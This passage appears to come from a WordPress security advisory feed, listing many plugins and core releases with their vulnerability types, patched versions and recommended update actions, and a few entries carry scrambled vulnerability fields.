Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPRealty

Vulnerability: Time-Based Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: adminer

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Extra User Details

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Social Sharing Plugin – Kiwi

Vulnerability: 2.1.2
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Menubar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8
Recommended Action: Update to version 5.8, or a newer patched version

Plugin: Short URL

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Bypass via IP Spoofing
Patched Version: 2.29.2
Recommended Action: Update to version 2.29.2, or a newer patched version

Plugin: Product Slider For WooCommerce Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Meta Keys
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: When Last Login

Vulnerability: Cross-Site Request Forgery via wll_hide_subscription_notice
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Easy restaurant menu manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Print-O-Matic

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Post Modification
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Reflected Cross-Site Scripting via lang & pid Parameters
Patched Version: 3.1.31
Recommended Action: Update to version 3.1.31, or a newer patched version

Plugin: Integration for WooCommerce and QuickBooks

Vulnerability: Open Redirect via setup_plugin
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: classyfrieds

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: reSmush.it : The original free image compressor and optimizer plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.4.7
Recommended Action: Update to version 0.4.7, or a newer patched version

Plugin: iframe forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via iframe Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.5.10
Recommended Action: Update to version 2.5.10, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.3.8.1
Recommended Action: Update to version 3.3.8.1, or a newer patched version

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.26
Recommended Action: Update to version 2.6.26, or a newer patched version

Plugin: Klarna Checkout for WooCommerce

Vulnerability: Arbitrary Plugin Installation, Activation and Deactivation
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting via AJAX Action
Patched Version: 1.3.8.5
Recommended Action: Update to version 1.3.8.5, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Logo Carousel

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting in Product XML Feeds Module
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Levo Slideshow

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Print, PDF, Email by PrintFriendly

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: SoundCloud Is Gold

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Icon Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: IBPS Online Exam Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Poll, Survey, Questionnaire and Voting system

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: CAPTCHA in Thai

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Landing Page – Squeeze Page – Responsive Landing Page Builder Free – WP Lead Plus X

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.99
Recommended Action: Update to version 0.99, or a newer patched version

Plugin: Order Tracking – WordPress Status Tracking Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.2.24
Recommended Action: Update to version 2.2.24, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via mf_thankyou shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Remote Code Execution via Improper Capability Checks in AJAX Calls
Patched Version: 2.54.6
Recommended Action: Update to version 2.54.6, or a newer patched version

Plugin: Accommodation System

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Premium Packages – Sell Digital Products Securely

Vulnerability: Sell Digital Products Securely <= 5.7.4
Patched Version: 5.7.5
Recommended Action: Update to version 5.7.5, or a newer patched version

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 7.6.3
Recommended Action: Update to version 7.6.3, or a newer patched version

Plugin: User Registration, Login & Landing Pages – LeadMagic

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WpGenius Job Listing

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Sell Photo

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: quartz

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MediaElement.js – HTML5 Video & Audio Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.16
Recommended Action: Update to version 2.9.16, or a newer patched version

Plugin: RSS Feed Retriever

Vulnerability: Missing Authorization
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Privilege Escalation
Patched Version: 3.2.6.8
Recommended Action: Update to version 3.2.6.8, or a newer patched version

Plugin: wp-download-manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.61
Recommended Action: Update to version 1.61, or a newer patched version

Plugin: WRC Pricing Tables – Responsive CSS3 Pricing Tables

Vulnerability: Missing Authorization
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: TI WooCommerce Wishlist

Vulnerability: Unauthenticated Blind SQL Injection via REST API
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via block attribute
Patched Version: 12.8-a.3
Recommended Action: Update to version 12.8-a.3, or a newer patched version

Plugin: Upload Resume

Vulnerability: Authenticated Sensitive Information Disclosure via resume_upload_form_list shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zingiri Web Shop

Vulnerability: Remote Code Execution
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: bookmarkify

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection

Vulnerability: Missing Authorization in ‘LoadTab’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Front End PM

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 11.4.3
Recommended Action: Update to version 11.4.3, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Sensitive File Disclosure
Patched Version: 4.58
Recommended Action: Update to version 4.58, or a newer patched version

Plugin: Site Reviews

Vulnerability: Cross-Site Scripting
Patched Version: 2.15.3
Recommended Action: Update to version 2.15.3, or a newer patched version

Plugin: Simple Post Notes

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: IgnitionDeck Crowdfunding Platform

Vulnerability: Missing Authorization
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: 12 Step Meeting List

Vulnerability: Missing Authorization
Patched Version: 3.14.29
Recommended Action: Update to version 3.14.29, or a newer patched version

Plugin: Product Compare for WooCommerce

Vulnerability: Missing Authorization via settings_init
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: GMAce

Vulnerability: Cross-Site Request Forgery to Arbitrary File Modification (Creation/Overwrite/Deletion)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.2.3.0
Recommended Action: Update to version 6.2.3.0, or a newer patched version

Plugin: Thinkific Uploader

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Recommendations

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Unauthenticated Arbitrary File or Directory Delete
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: WP Popup Banners

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BSK Forms Blacklist

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: The Events Calendar

Vulnerability: Information Disclosure
Patched Version: 6.2.8.1
Recommended Action: Update to version 6.2.8.1, or a newer patched version

Plugin: Welcome Bar

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Post Snippets – Custom WordPress Code Snippets Customizer

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: ZM Ajax Login & Register

Vulnerability: Local File Inclusion
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Reflected Cross-Site Scripting via qc_res
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Library Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.6.1
Recommended Action: Update to version 2.0.6.1, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via wdk_resultitem
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Divi Builder

Vulnerability: 4.0.9, Divi Extra 2.23
Patched Version: 4.0.10
Recommended Action: Update to version 4.0.10, or a newer patched version

Plugin: 2 Click Social Media Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 0.34
Recommended Action: Update to version 0.34, or a newer patched version

Plugin: User Domain Whitelist

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: QR Redirector

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: We’re Open!

Vulnerability: Missing Authorization
Patched Version: 1.45
Recommended Action: Update to version 1.45, or a newer patched version

Plugin: Call Now Icon Animate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accept Stripe Payments

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.64
Recommended Action: Update to version 2.0.64, or a newer patched version

Plugin: CiviCRM for WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 5.28.1
Recommended Action: Update to version 5.28.1, or a newer patched version

Plugin: wp-lightpop

Vulnerability: Remote Media File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hunk External Links

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Private Content Disclosure
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Updater by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.35
Recommended Action: Update to version 1.35, or a newer patched version

Plugin: Swift Performance Lite

Vulnerability: Missing Authorization to Unauthenticated Settings Export
Patched Version: 2.3.6.15
Recommended Action: Update to version 2.3.6.15, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.6.1
Recommended Action: Update to version 7.6.1, or a newer patched version

Plugin: Meta Box

Vulnerability: WordPress Custom Fields Framework <= 4.16.2
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: WP-Property – WordPress Powered Real Estate and Property Management

Vulnerability: Information Disclosure
Patched Version: 1.38.4
Recommended Action: Update to version 1.38.4, or a newer patched version

Plugin: Student Result or Employee Database

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Docket Cache – Object Cache Accelerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 21.08.02
Recommended Action: Update to version 21.08.02, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Subscriber+ Event Creation
Patched Version: 1.1.51
Recommended Action: Update to version 1.1.51, or a newer patched version

Plugin: SpamBam

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HK Exif Tags

Vulnerability: Cross-Site Scripting
Patched Version: 1.12
Recommended Action: Update to version 1.12, or a newer patched version

Plugin: WP-FaceThumb

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Stored Cross-Site Scripting via Uploaded SVG
Patched Version: 1.5.75
Recommended Action: Update to version 1.5.75, or a newer patched version

Plugin: Quick Event Manager

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Plugin: InventoryPress

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Footnotes

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Insecure Cryptography to Sensitive Information Disclosure
Patched Version: 0.9.2.5
Recommended Action: Update to version 0.9.2.5, or a newer patched version

Plugin: wp-keyword-link

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Reply Notify

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Information Disclosure
Patched Version: 2.9.10
Recommended Action: Update to version 2.9.10, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.46.1
Recommended Action: Update to version 2.46.1, or a newer patched version

Plugin: Website Contact Form With File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.5
Recommended Action: Update to version 3.8.5, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.4
Recommended Action: Update to version 1.15.4, or a newer patched version

Plugin: Adminimize

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.22
Recommended Action: Update to version 1.7.22, or a newer patched version

Plugin: All-in-One Video Gallery

Vulnerability: 2.6.0
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: SQL Injection
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Search Unleashed

Vulnerability: Cross-Site Scripting
Patched Version: 0.2.11
Recommended Action: Update to version 0.2.11, or a newer patched version

Plugin: CopyRightPro

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPsc MijnPress

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Becustom

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.5.3
Recommended Action: Update to version 1.0.5.3, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) HTML Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP125

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Snow Monkey Forms

Vulnerability: Directory Traversal via ‘view’ REST endpoint
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Web-Stat Analytics – Free Real-Time Web Analytics

Vulnerability: API Key Disclosure
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: CSV Injection
Patched Version: 1.2.5.6
Recommended Action: Update to version 1.2.5.6, or a newer patched version

Plugin: PHP to Page

Vulnerability: Authenticated (Subscriber+) Local File Inclusion to Remote Code Execution via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Page Generator

Vulnerability: Cross-Site Request Forgery to Arbitrary Keywords Deletion/Duplication
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Authentication Bypass
Patched Version: 2.0.9.2
Recommended Action: Update to version 2.0.9.2, or a newer patched version

Plugin: If-So Dynamic Content Personalization

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 0.9.4.1
Recommended Action: Update to version 0.9.4.1, or a newer patched version

Plugin: Request For Quote

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Tagregator

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wholesale Market for WooCommerce

Vulnerability: Authenticated (Administrator+) Arbitrary Log File Download
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Baidu Tongji generator

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.7.1
Recommended Action: Update to version 1.4.7.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in listenTosFieldSavingTask function
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Lightweight Sidebar Manager

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.1.13
Recommended Action: Update to version 8.1.13, or a newer patched version

Plugin: BuddyPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: WooCommerce Custom Registration Form

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPB Show Core

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mobile Events Manager

Vulnerability: Authenticated (Administrator+) CSV Injection
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Cross-Site Request Forgery on AJAX actions
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: Yellow Yard Searchbar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.12
Recommended Action: Update to version 2.8.12, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Reflected Cross-Site Scripting via ‘search’
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: User Activity Log

Vulnerability: Unauthenticated SQL Injection via username
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: EELV Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Level Four Store Front

Vulnerability: SQL Injection
Patched Version: 8.1.1
Recommended Action: Update to version 8.1.1, or a newer patched version

Plugin: IMDB Info Box

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Jeg Elementor Kit

Vulnerability: Authorization Bypass
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

